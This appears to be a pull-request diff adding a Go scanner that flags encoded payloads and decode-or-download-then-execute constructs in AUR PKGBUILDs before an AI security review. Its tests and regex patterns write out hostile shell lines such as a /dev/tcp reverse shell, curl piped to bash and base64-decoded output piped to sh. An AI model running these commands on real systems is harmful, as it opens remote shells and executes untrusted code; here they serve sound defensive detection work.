+	if e := shannon(structured); e < encodedEntropy {
+		t.Fatalf("test string entropy %.2f below threshold; not a valid case", e)
+	}
+	pkg := `source=('x.tar.gz')
+_x="` + structured + `"`
+	r := Scan(pkg)
+	if hasKind(r, KindUnexplainedEntropy) {
+		t.Errorf("structured (compressible) string wrongly flagged: %+v", r.Findings)
+	}
+}
+
+func TestBlobInCommentIgnored(t *testing.T) {
+	payload := "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weTEyMzQ1Njc4OTBYWVo"
+	pkg := "source=('x.tar.gz')\n# example only: _p=\"" + payload + "\""
+	r := Scan(pkg)
+	if hasKind(r, KindUnexplainedEntropy) {
+		t.Errorf("payload inside a comment should be ignored: %+v", r.Findings)
+	}
+}
+
+func TestZoneReportsFunction(t *testing.T) {
+	payload := "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weTEyMzQ1Njc4OTBYWVo"
+	pkg := "source=('x.tar.gz')\npackage() {\n  _p=\"" + payload + "\"\n}"
+	r := Scan(pkg)
+	var got string
+	for _, f := range r.Findings {
+		if f.Kind == KindUnexplainedEntropy {
+			got = f.Zone
+		}
+	}
+	if got != "package()" {
+		t.Errorf("zone = %q, want package()", got)
+	}
+}
+
+func TestDecodeExecShapeRecognized(t *testing.T) {
+	cases := map[string]string{
+		"base64 pipe": `build() { echo "$_x" | base64 -d | sh; }`,
+		"eval var":    `build() { eval "$_payload"; }`,
+		"curl pipe":   `package() { curl https://x.example/i | bash; }`,
+		"dev tcp":     `package() { bash -i >& /dev/tcp/1.2.3.4/443 0>&1; }`,
+	}
+	for name, src := range cases {
+		t.Run(name, func(t *testing.T) {
+			r := Scan(src)
+			if !hasKind(r, KindDecodeExecShape) {
+				t.Errorf("decode/exec shape not recognized: %+v", r.Findings)
+			}
+		})
+	}
+}
+
+func TestConcerningCooccurrence(t *testing.T) {
+	blob := "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weTEyMzQ1Njc4OTBYWVo"
+	pkg := `source=('x.tar.gz')
+package() {
+  _p="` + blob + `"
+  echo "$_p" | base64 -d | sh
+}`
+	r := Scan(pkg)
+	if !r.Concerning() {
+		t.Errorf("expected Concerning() true (opaque blob + decode/exec): %+v", r.Findings)
+	}
+}
+
+// TestRealWorldStringsNotFlagged pins the false positives found by scanning real
+// AUR packages (brave-bin, google-chrome, spotify, visual-studio-code-bin) so a
+// future threshold change can't silently reintroduce them.
+func TestRealWorldStringsNotFlagged(t *testing.T) {
+	benign := []string{
+		`package() { cp "$pkgdir/opt/brave-bin/chrome-sandbox" .; }`,
+		`package() { install "/opt/google/chrome/WidevineCdm/LICENSE" x; }`,
+		`package() { echo "StartupWMClass=Google-chrome" >> x.desktop; }`,
+		"pkgname=visual-studio-code-bin",
+		"_pkgname=visual-studio-code",
+		`prepare() { cp "non-free/binary-amd64/Packages" .; }`,
+		`package() { install icons/spotify-linux-512.png x; }`,
+	}
+	for _, src := range benign {
+		r := Scan(src)
+		if hasKind(r, KindUnexplainedEntropy) {
+			t.Errorf("benign real-world string flagged: %q\n%+v", src, r.Findings)
+		}
+	}
+}
+
 func TestAgentBlockShape(t *testing.T) {
 	clean := Scan("sha256sums=('" + realSha256 + "')\nsource=('x.tar.gz')")
 	if !strings.Contains(clean.AgentBlock(), "No anomalies") {

--- a/internal/scanner/shapes.go
+++ b/internal/scanner/shapes.go
@@ -1,0 +1,50 @@
+package scanner
+
+import (
+	"regexp"
+	"strings"
+)
+
+// dangerShapes recognize the SILHOUETTE of decode/download-then-execute
+// constructs. We match the shape only — we never run, decode, or interpret what
+// flows through them. Recognition and avoidance, not forensics.
+var dangerShapes = []struct {
+	re   *regexp.Regexp
+	note string
+}{
+	{regexp.MustCompile(`(?i)base64\s+(?:-d|--decode)\b[^\n|]*\|\s*(?:sh|bash|zsh|dash)\b`),
+		"base64-decoded output piped straight to a shell"},
+	{regexp.MustCompile(`(?i)(?:xxd\s+-r|openssl\s+enc[^\n|]*-d|gunzip|zcat|gzip\s+-d|xz\s+-d|base32\s+-d)\b[^\n|]*\|\s*(?:sh|bash|zsh|dash)\b`),
+		"decoded/decompressed output piped straight to a shell"},
+	{regexp.MustCompile(`(?i)\beval\s+["']?\$`),
+		"eval of a variable's contents"},
+	{regexp.MustCompile(`(?i)(?:curl|wget)\b[^\n|]*\|\s*(?:sh|bash|zsh|dash)\b`),
+		"download piped straight to a shell"},
+	{regexp.MustCompile(`(?i)(?:sh|bash)\s+-c\s+["']?\$\(\s*(?:curl|wget)`),
+		"shell -c executing the output of a download"},
+	{regexp.MustCompile(`/dev/tcp/`),
+		"raw /dev/tcp socket (possible reverse shell)"},
+	{regexp.MustCompile(`(?i)\bnc\b[^\n]*\s-[a-z]*e[a-z]*\b`),
+		"netcat with command execution (-e)"},
+}
+
+// scanShapes appends decode/exec silhouette findings. It ignores whole-line
+// comments so a documented example doesn't trip it.
+func (r *Report) scanShapes(pkgbuild string) {
+	for i, line := range strings.Split(pkgbuild, "\n") {
+		if strings.HasPrefix(strings.TrimSpace(line), "#") {
+			continue
+		}
+		for _, s := range dangerShapes {
+			if s.re.MatchString(line) {
+				r.DecodeExec++
+				r.Findings = append(r.Findings, Finding{
+					Kind: KindDecodeExecShape,
+					Line: i + 1,
+					Zone: "code",
+					Note: s.note,
+				})
+			}
+		}
+	}
+}


### PR DESCRIPTION
Prototype of the pre-scan stage we designed: a deterministic, **injection-proof** entropy scanner that runs before the Claude call and hands the model ground truth it can't be talked out of.

## The model
Position-aware — a real checksum is *supposed* to be high-entropy, so the test is whether entropy matches what the position claims:

| | High entropy | Low entropy |
|---|---|---|
| in `*sums=()` / right hex length | ✅ genuine digest (excluded) | ⚠️ flag — crafted value wearing checksum clothes |
| elsewhere | ⚠️ flag — possible encoded payload | ✅ ordinary code |

Plus **count anomaly**: more unexplained high-entropy blobs than sources ⇒ flag (decryptor+payload). The low-entropy and count checks catch opposite evasions (plaintext-hidden vs encrypted-hidden payloads).

## Wiring
`buildSimpleSecurityPrompt` scans PKGBUILD + install script + helper files and injects a `<static_prescan>` block into a new `{STATIC_PRESCAN}` prompt slot; the prompt tells the model to treat the flags as trusted ground truth.

## Verified (no API cost)
- `internal/scanner`: planted base64 → flagged; real `sha256sums` → silent; low-entropy fake checksum → flagged; two blobs/one source → excess-count.
- `internal/providers`: the scan block actually lands in the generated prompt (planted payload → `unexplained_entropy`; clean pkg → `No anomalies`).

## Scope / follow-ons (first cut)
Entropy signal only. Not yet: URL heuristics, `.install`-hook rules, direct user-facing display of scanner findings, per-file line numbers (currently within the concatenated scan text). **Caveat:** injection uses the `{STATIC_PRESCAN}` slot in the *default* prompt — a user whose `config.yaml` predates this won't get it until they regenerate (`config init`).

Left open for review since the detection model is still being shaped.